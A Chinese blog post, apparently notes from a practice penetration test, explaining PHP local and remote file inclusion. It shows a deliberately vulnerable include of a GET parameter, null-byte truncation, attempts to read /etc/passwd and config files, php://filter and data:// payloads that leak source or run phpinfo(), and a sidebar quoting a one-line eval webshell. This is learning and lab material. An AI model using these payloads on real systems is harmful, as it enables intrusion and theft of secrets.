WEB渗透测试_文件包含

最新推荐文章于 2024-05-27 08:00:00 发布
最新推荐文章于 2024-05-27 08:00:00 发布
阅读量1k 收藏 5
点赞数
分类专栏: WEB安全 文章标签: 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38677814/article/details/80993953
版权

概念
开发人员使用某些函数时直接调用此文件而无需再次编写 ->包含
将被包含的文件设置为一个变量 实现动态调用 灵活->弊端:漏洞的存在
PHP 四个函数:
include()
找不到目标文件 ->E_WARNING 脚本将继续执行
include_once()
顾名思义,包含1次
require()
找不到目标文件 ->E_COMPILE_ERROR 停止脚本
require_once()
顾名思义,包含1次

远程文件包含:RFI:REMOTE FILE INCLUDE &blah=
Index.php代码如下

<?php
    include($_GET['page']);
?>

在自己网站上有文件如下:
http://xxx/php.txt
其中的代码为

<?php
    echo "Hello World";
?>

访问http://target/Index.php?page=http://xxx/php.txt
要求开启
allow_url_include = on
该设置位于php.ini中

本地文件包含:LFI:LOCAL FILE INCLUDE %00截断后缀

下面用实例测试目标服务器的漏洞类型

1.记录一次渗透测试
随便写个后缀
发现文件包含有问题
http://xxxx/index.php?p=test
( ! ) Warning: include(test.page.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in /usr/local/apache2/htdocs/index.php on line 17

分析:
脚本的路径
/usr/local/apache2/htdocs/index.php
位于第17行 没啥用
include 函数! 关键
include(test.page.php)
意思是后面查询的会被写进去

写了%00截断一下看看
http://xxxxx/index.php?p=flag%00
Warning: include(flag) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in /usr/local/apache2/htdocs/index.php on line 17
好像有点思路?
我测试了好多敏感文件的位置(跨目录包含)
如下
目标系统是unix系统
/etc/passwd
/usr/local/app/apache2/conf/httpd.conf apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf 虚拟网站设置
/usr/local/app/php5/lib/php.ini php相关设置
/etc/httpd/conf/httpd.conf apache配置文件
/etc/my.cnf Mysql的配置文件

测试了一波
http://xxx/index.php?p=/etc/passwd%00

都只会返回主页
看起来这种方式不能用了
防御:
防止跨目录:
在php.ini中设置open_basedir 猜想可能用了这招

试试远程文件包含
http://xxx/index.php?p=https://assets.pentesterlab.com/test_include.txt&blah=
我这里貌似失灵了
应该对’/’ ‘..’ 做了过滤

百度了一下有人用curl测试
根据我这台服务器百度搜索他的服务器日志文件位置
usr/local/apache2/logs/access_log
没用 我这个实例中没法直接按照路径索引得到目标文件
我不知道目标文件的位置 不可能大海捞针尝试名字
意味着肯定可能要getshell 或者 其他骚操作

法①:使用内置协议读取PHP文件

file://访问本地文件系统
http:// 网址
ftp:// 访问FTP url
php:// 输入/输出流 I/O streams
zlib:// 压缩刘
data:// 数据 RFC 2397
ssh2:// Secure Shell 2
expect:// 处理交互式的流
glod:// 查找匹配的文件路径

http://xxx/index.php?p=php://filter/read=convert.base64-encode/resource=config.php%00
得到之后是一串base64
解码可以看源代码
试试看data
http://xxx/index.php?p=data:text/plain,%3C?php%20phpinfo();?%3E
成功
返回phpinfo();
随便测试了一个
http://xxx/index.php?p=php://filter/read=convert.base64-encode/resource=flag.php%00
成功~
法②
图片木马
需要配合上传功能
这里不讲了

god_speed丶
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试文件包含漏洞
weixin_45380284的博客
03-06 886
文件包含漏洞: 理论: 文件包含: 编写程序时把重复使用的函数写到单个文件中,在使用这些函数的时候,直接调用此文件,就无需再次编写,这种调用文件的过程叫做包含 文件包含漏洞: 开发人员希望代码更加灵活,所以会将被包含的文件设置为变量,用来动态调用。 文件包含漏洞产生的原因就是函数通过变量引入文件时,没有对传入的文件名进行合理的校验,从而操作了预想之外的文件,这样就导致了意外的文件泄露甚至恶意代码注入。 文件包含函数: PHP中提供文件包含的函数: include() 找不到被包含的文件时只产生警告 inc
web渗透文件包含漏洞-学习笔记分享
weixin_52112965的博客
07-16 1098
文件包含知识的总结
web渗透【10】文件包含漏洞
司徒荆的博客
01-06 895
文件包含漏洞,包含本地文件包含漏洞,session文件包含漏洞,远程文件包含漏洞,php伪协议
文件包含漏洞:pikachu与DVWA靶场中的文件包含漏洞通关
最新发布
qq_68163788的博客
05-27 1162
文件包含漏洞是一种常见的Web安全漏洞,攻击者可以通过包含恶意文件来执行任意代码或获取敏感信息。在DVWA靶场中,通过利用文件包含漏洞,可以获取系统文件、敏感信息或者执行恶意代码。pikachu可以通过构造恶意文件路径,利用DVWA中的文件包含漏洞来获取管理员权限或者对系统进行攻击。为了防范文件包含漏洞,开发者应该避免直接包含用户输入的文件,并且对输入进行严格的过滤和验证。通过了解和掌握文件包含漏洞的原理和利用方法,可以帮助提高Web应用程序的安全性。
web渗透-文件包含漏洞利用>
weixin_45540964的博客
11-25 459
(1) .读取敏感文件 利用文件包含漏洞读取任意文件,读取文件的时候有利用条件 @目标主机文件存在 (目标文件的绝对路径,相对路径) @具有文件的可读权限 提交参数 绝对路径 ?path=c:\路径\ 尝试相对路径 ?path=..\..\..\..\..\..\路径\ (2) .直接包含图片木马 将木马信息写入图片附加信息中 图片附加信息 版权等. <?php @eval($_REQUEST[777])?> 使用菜刀连接 (3
渗透测试之本地文件包含漏洞
黑面狐
12-14 1838
1.概述 本地文件包含允许攻击者通过浏览器包含一个服务器上的文件。当一个WEB应用程序在没有正确过滤输入数据的情况下,就有可能存在这个漏洞,该漏洞允许攻击者操纵输入数据、注入路径遍历字符、包含web服务器的其他文件 2.实验 本地写了一个文件包含php文件 <?php $a=$_GET['test']; include($a); ?> 包含一个内容为的jpg文件,我们看看效果:
渗透测试面试题2019版_面试_渗透测试_
09-30
- **Burp Suite**:Web应用渗透测试套件,包括拦截代理、扫描器、爬虫等功能。 - **Metasploit**:漏洞利用框架,提供多种已知漏洞的exploit模块。 - **Wireshark**:网络封包分析工具,用于捕获和解析网络流量。...
渗透测试 _ 内网信息收集1
08-03
通过检查主机名、文件和网络连接等信息,可以判断这台机器是Web服务器、开发测试服务器、文件服务器、代理服务器、DNS服务器还是其他类型。 2. **这是哪?** 这一步需要分析当前机器所处的网络环境,包括网络拓扑...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
渗透测试技术之本地文件包含
02-01
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
关于<a href='javascript:function()'>的使用
叶落无痕的博客
05-02 1万+
这样写是为了让这个链接不要链接到新页面转而执行一段js代码。 和onclick能起到同样的效果,一般来说,如果要调用脚本还是在onclick事件里面写代码, 而不推荐href='javascript:function()' 这样的写法, 因为href属性里面设置了js代码后,在某些浏览器下可能会引发其他不必要的事件。 而且onclick事件会比href属性先执行,所以会先触
web渗透--14--目录遍历/文件包含测试
武天旭的博客
09-12 2594
1、漏洞描述 文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果。主要包括本地文件包含和远程文件包含两种形式,由于开发人员编写源码,开放着将可重复使用的代码插入到单个的文件中,并在需要的时候将它们包含在特...
靶机12 PENTESTER LAB: XSS AND MYSQL FILE
honest_gg的博客
10-09 1786
本靶机练习说明如何使用跨站点脚本漏洞来访问管理员的 Cookie。然后,如何使用他/她的会话来访问管理以查找SQL注入并使用它获得代码执行。
文件包含漏洞及测试
qq_43355651的博客
09-27 1537
文件包含漏洞 通过发生在PHP中 很多站点为了节约资源,在代码中写入了文件包含,将文件设置为变量,用户对变量的值可控,而服务器未对变量的值合理的校检,导致了文件包含漏洞的产生。 通常使用的函数: include():使用次函数包含文件时,发生错误会有警告,然后继续向下执行。 require();发生错误后,会终止运行。 可以通过文件包含来读取敏感文件等等 写入文件用 phpinfo 这里我们通过一次实验更好的理解一下文件包含漏洞: 这里我们用到的是墨者学院-phpMyAdmin后台文.
Kali渗透测试之DVWA系列9——File Inclusion(文件包含)
浅浅的博客
06-14 2683
目录 一、文件包含 二、实验环境 三、实验步骤 Windows 安全等级:LOW 安全等级:Medium 安全等级:High 安全等级:Impossible Linux 安全等级:LOW 安全等级:Medium 安全等级:High 一、文件包含 1、文件包含原理 文件包含:开发人员将相同的函数写入单独的文...
web渗透--2--web安全原则(上)
热门推荐
武天旭的博客
09-10 1万+
web安全原则 安全应该是系统开发之初就考虑的问题。换句话说,安全是一个成熟系统的必备特性。在项目说明中不谈安全,并非因为不需要,而是因为安全都是隐藏的。 安全性设计中的关键问题是挖掘出系统存在的安全漏洞。在这我们可以采用黑盒测试或者安全检测工具来进行。在开发过程中,遵守一些web安全原则,是提高安全很好的措施: 一、Web部署原则 1、如果Web应用对Internet开放,Web服务器应...
lib zfunction.php,PHP Warning: include() [function.include]: Failed opening '/xxxx.php' for inclusi...
weixin_31893893的博客
04-10 1273
PHP Warning: include() [function.include]: Failed opening '/xxxx.php' for inclusion (include_path='.:/xxx/xxx/php/lib/php') in xxx.php解决方法发布于 2014-10-05 19:06:48 | 4292 次阅读 | 评论: 0 | 来源: 网友投递PHP开源脚本语...
安全测试概述
分享博主日常学习和使用的一些技术
10-09 1011
根据经验持续修正~~~初稿2016.10.9 安全也是一个抽象的概念,越抽象的概念描述的范围越广。 安全测试对于系统或者软件来说非常重要,因为充分的安全测试发现系统中一部分潜在的漏洞,找到系统易受到攻击的点,并对系统进行加固。一份非常完善的安全测试报告是对软件安全性的一种保障。而测试报告依靠的是什么?是一个个用例的覆盖,是一次次扫描工具的扫描,甚至是模糊渗透测试的反向验证。 安全我想也会有很多
Web渗透测试入门:基础与安全风险
"Web渗透测试攻略(上):学习如何进行Web应用的安全测试,了解网络IP配置,以及Web安全模型和风险。" 在Web渗透测试领域,深入理解Web应用程序的工作原理和潜在安全问题至关重要。这份文档旨在引导读者掌握必要的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值